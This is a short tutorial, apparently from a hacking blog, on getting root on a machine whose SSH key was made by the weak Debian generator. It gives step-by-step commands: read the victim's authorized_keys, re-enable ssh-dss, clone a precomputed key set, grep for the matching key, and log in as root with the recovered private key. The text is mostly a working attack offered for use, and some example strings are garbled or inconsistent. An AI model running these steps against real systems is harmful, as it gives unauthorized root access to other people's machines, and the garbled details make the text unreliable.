For this method to work, you need to have the authorized key of the victim machine
cat authorized_keys ssh-dss AAAAB3NzaC1kc3MAAACBAOgzzMCD3Im5bRnAVdV3yLwTs................................
SSH-DSS is disabled on new versions of SSH, so you need to enable it
nano /etc/ssh/ssh_config PubkeyAcceptedKeyTypes +ssh-dss
git clone https://github.com/g0tmi1k/debian-ssh tar vjxf debian-ssh/common_keys/debian_ssh_dsa_1024_x86.tar.bz2 cd /dss/1024
Copy first few characters from the authorized keys and we going to search for the key from the list of keys we downloaded earlier
grep -lr 'AAAAB3Ndskkdsjhfodsi4m5adsa6d5s8RadSsdsWassd3rhf6gySd2sdS34rW'
you can see some file with random characters with .pub file; ex: e2eb2172a62d0d7e40f210g6167f65ca-12345.pub
But, what we need is not a public key - we need private key to login :)
so, search for it again
ls -la | grep e2eb2172a62d0Now you can see two files one private key and one public key;
use e2eb2172a62d0d7e40f210g6167f65ca-12345 Private key to login with ssh
chmod 400 e2eb2172a62d0d7e40f210g6167f65ca-12345
ssh -i e2eb2172a62d0d7e40f210g6167f65ca-12345 root@IP_Address
Comments
Post a Comment